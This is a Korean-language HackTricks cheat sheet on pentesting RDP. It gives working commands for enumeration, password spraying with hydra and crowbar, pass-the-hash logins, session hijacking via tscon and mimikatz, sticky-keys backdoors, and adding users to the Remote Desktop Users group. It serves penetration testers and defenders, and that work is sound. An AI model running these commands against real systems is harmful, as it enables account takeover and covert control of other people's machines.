3389 - Pentesting RDP

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๋ณธ ์ •๋ณด

Microsoft์—์„œ ๊ฐœ๋ฐœํ•œ Remote Desktop Protocol (RDP)๋Š” ๋„คํŠธ์›Œํฌ๋ฅผ ํ†ตํ•ด ์ปดํ“จํ„ฐ ๊ฐ„์˜ ๊ทธ๋ž˜ํ”ฝ ์ธํ„ฐํŽ˜์ด์Šค ์—ฐ๊ฒฐ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•˜๋„๋ก ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ์ž๋Š” RDP ํด๋ผ์ด์–ธํŠธ ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ์‚ฌ์šฉํ•˜๊ณ , ๋™์‹œ์— ์›๊ฒฉ ์ปดํ“จํ„ฐ๋Š” RDP ์„œ๋ฒ„ ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ์šด์˜ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด ์„ค์ •์€ ์›๊ฑฐ๋ฆฌ ์ปดํ“จํ„ฐ์˜ ๋ฐ์Šคํฌํƒ‘ ํ™˜๊ฒฝ์„ ์›ํ™œํ•˜๊ฒŒ ์ œ์–ดํ•˜๊ณ  ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜์—ฌ, ๋ณธ์งˆ์ ์œผ๋กœ ๊ทธ ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ์‚ฌ์šฉ์ž์˜ ๋กœ์ปฌ ์žฅ์น˜๋กœ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค.

๊ธฐ๋ณธ ํฌํŠธ: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Enumeration

Automatic

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ์•”ํ˜ธํ™” ๋ฐ DoS ์ทจ์•ฝ์„ฑ์„ ํ™•์ธํ•˜๊ณ (์„œ๋น„์Šค์— DoS๋ฅผ ์œ ๋ฐœํ•˜์ง€ ์•Š์Œ) NTLM Windows ์ •๋ณด(๋ฒ„์ „)๋ฅผ ์–ป์Šต๋‹ˆ๋‹ค.

Brute force

์ฃผ์˜ํ•˜์„ธ์š”, ๊ณ„์ •์ด ์ž ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค

Password Spraying

์ฃผ์˜ํ•˜์„ธ์š”, ๊ณ„์ •์ด ์ž ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

์•Œ๋ ค์ง„ ์ž๊ฒฉ ์ฆ๋ช…/ํ•ด์‹œ๋กœ ์—ฐ๊ฒฐํ•˜๊ธฐ

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

RDP ์„œ๋น„์Šค์— ๋Œ€ํ•œ ์•Œ๋ ค์ง„ ์ž๊ฒฉ ์ฆ๋ช… ํ™•์ธ

impacket์˜ rdp_check.py๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ์ผ๋ถ€ ์ž๊ฒฉ ์ฆ๋ช…์ด RDP ์„œ๋น„์Šค์— ๋Œ€ํ•ด ์œ ํšจํ•œ์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

rdp_check <domain>/<name>:<password>@<IP>

๊ณต๊ฒฉ

์„ธ์…˜ ํƒˆ์ทจ

SYSTEM ๊ถŒํ•œ์œผ๋กœ ์‚ฌ์šฉ์ž์— ์˜ํ•ด ์—ด๋ฆฐ ๋ชจ๋“  RDP ์„ธ์…˜์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์†Œ์œ ์ž์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์•Œ ํ•„์š”๊ฐ€ ์—†์Šต๋‹ˆ๋‹ค.

์—ด๋ฆฐ ์„ธ์…˜ ๊ฐ€์ ธ์˜ค๊ธฐ:

query user

์„ ํƒํ•œ ์„ธ์…˜์— ๋Œ€ํ•œ ์ ‘๊ทผ

tscon <ID> /dest:<SESSIONNAME>

์ด์ œ ์„ ํƒํ•œ RDP ์„ธ์…˜์— ๋“ค์–ด๊ฐ€๊ฒŒ ๋˜๋ฉฐ, Windows ๋„๊ตฌ์™€ ๊ธฐ๋Šฅ๋งŒ์„ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž๋ฅผ ๊ฐ€์žฅํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

์ค‘์š”: ํ™œ์„ฑ RDP ์„ธ์…˜์— ์ ‘๊ทผํ•˜๋ฉด ํ•ด๋‹น ์„ธ์…˜์„ ์‚ฌ์šฉ ์ค‘์ธ ์‚ฌ์šฉ์ž๊ฐ€ ๊ฐ•์ œ๋กœ ๋กœ๊ทธ์•„์›ƒ๋ฉ๋‹ˆ๋‹ค.

ํ”„๋กœ์„ธ์Šค๋ฅผ ๋คํ”„ํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์ง€๋งŒ, ์ด ๋ฐฉ๋ฒ•์€ ํ›จ์”ฌ ๋น ๋ฅด๋ฉฐ ์‚ฌ์šฉ์ž์˜ ๊ฐ€์ƒ ๋ฐ์Šคํฌํƒ‘๊ณผ ์ƒํ˜ธ์ž‘์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค (๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ๋””์Šคํฌ์— ์ €์žฅ๋˜์ง€ ์•Š์€ ๋ฉ”๋ชจ์žฅ, ๋‹ค๋ฅธ ๋จธ์‹ ์—์„œ ์—ด๋ฆฐ ๋‹ค๋ฅธ RDP ์„ธ์…˜ ๋“ฑโ€ฆ).

Mimikatz

์ด ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•˜๊ธฐ ์œ„ํ•ด mimikatz๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

์ด ๊ธฐ์ˆ ์„ stickykeys ๋˜๋Š” utilman๊ณผ ๊ฒฐํ•ฉํ•˜๋ฉด ์–ธ์ œ๋“ ์ง€ ๊ด€๋ฆฌ CMD์™€ RDP ์„ธ์…˜์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด ๊ธฐ์ˆ  ์ค‘ ํ•˜๋‚˜๋กœ ๋ฐฑ๋„์–ด๊ฐ€ ์„ค์ •๋œ RDP๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: https://github.com/linuz/Sticky-Keys-Slayer

RDP Process Injection

๋‹ค๋ฅธ ๋„๋ฉ”์ธ์—์„œ ๋˜๋Š” ๋” ๋‚˜์€ ๊ถŒํ•œ์œผ๋กœ RDP๋ฅผ ํ†ตํ•ด ๋กœ๊ทธ์ธํ•œ ์‚ฌ์šฉ์ž๊ฐ€ ๋‹น์‹ ์ด ๊ด€๋ฆฌ์ž์ธ PC์— ์ ‘์†ํ•˜๋ฉด, ๊ทธ์˜ RDP ์„ธ์…˜ ํ”„๋กœ์„ธ์Šค์— ๋‹น์‹ ์˜ ๋น„์ฝ˜์„ ์ฃผ์ž…ํ•˜๊ณ  ๊ทธ์ฒ˜๋Ÿผ ํ–‰๋™ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

RDP Sessions Abuse

Adding User to RDP group

net localgroup "Remote Desktop Users" UserLoginName /add

Automatic Tools

AutoRDPwn๋Š” Microsoft Windows ์ปดํ“จํ„ฐ์—์„œ Shadow ๊ณต๊ฒฉ์„ ์ž๋™ํ™”ํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ๋กœ ์„ค๊ณ„๋œ Powershell๋กœ ์ƒ์„ฑ๋œ ํฌ์ŠคํŠธ ์ต์Šคํ”Œ๋กœ์ž‡ ํ”„๋ ˆ์ž„์›Œํฌ์ž…๋‹ˆ๋‹ค. ์ด ์ทจ์•ฝ์ (๋งˆ์ดํฌ๋กœ์†Œํ”„ํŠธ์—์„œ ๊ธฐ๋Šฅ์œผ๋กœ ๋‚˜์—ด๋จ)์€ ์›๊ฒฉ ๊ณต๊ฒฉ์ž๊ฐ€ ํ”ผํ•ด์ž์˜ ๋ฐ์Šคํฌํƒ‘์„ ๊ทธ์˜ ๋™์˜ ์—†์ด ๋ณผ ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๋ฉฐ, ์‹ฌ์ง€์–ด ์šด์˜ ์ฒด์ œ ์ž์ฒด์˜ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•„์š”์— ๋”ฐ๋ผ ์ด๋ฅผ ์ œ์–ดํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

  • EvilRDP

  • ๋ช…๋ น์ค„์—์„œ ์ž๋™ํ™”๋œ ๋ฐฉ์‹์œผ๋กœ ๋งˆ์šฐ์Šค์™€ ํ‚ค๋ณด๋“œ ์ œ์–ด

  • ๋ช…๋ น์ค„์—์„œ ์ž๋™ํ™”๋œ ๋ฐฉ์‹์œผ๋กœ ํด๋ฆฝ๋ณด๋“œ ์ œ์–ด

  • RDP๋ฅผ ํ†ตํ•ด ๋Œ€์ƒ์—๊ฒŒ ๋„คํŠธ์›Œํฌ ํ†ต์‹ ์„ ์ „๋‹ฌํ•˜๋Š” SOCKS ํ”„๋ก์‹œ ์ƒ์„ฑ

  • ํŒŒ์ผ์„ ์—…๋กœ๋“œํ•˜์ง€ ์•Š๊ณ ๋„ ๋Œ€์ƒ์—์„œ ์ž„์˜์˜ SHELL ๋ฐ PowerShell ๋ช…๋ น ์‹คํ–‰

  • ๋Œ€์ƒ์—์„œ ํŒŒ์ผ ์ „์†ก์ด ๋น„ํ™œ์„ฑํ™”๋˜์–ด ์žˆ์–ด๋„ ๋Œ€์ƒ๊ณผ ํŒŒ์ผ์„ ์—…๋กœ๋“œ ๋ฐ ๋‹ค์šด๋กœ๋“œ

  • SharpRDP

์ด ๋„๊ตฌ๋Š” ๊ทธ๋ž˜ํ”ฝ ์ธํ„ฐํŽ˜์ด์Šค๊ฐ€ ํ•„์š” ์—†์ด ํ”ผํ•ด์ž์˜ RDP์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

HackTricks Automatic Commands

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ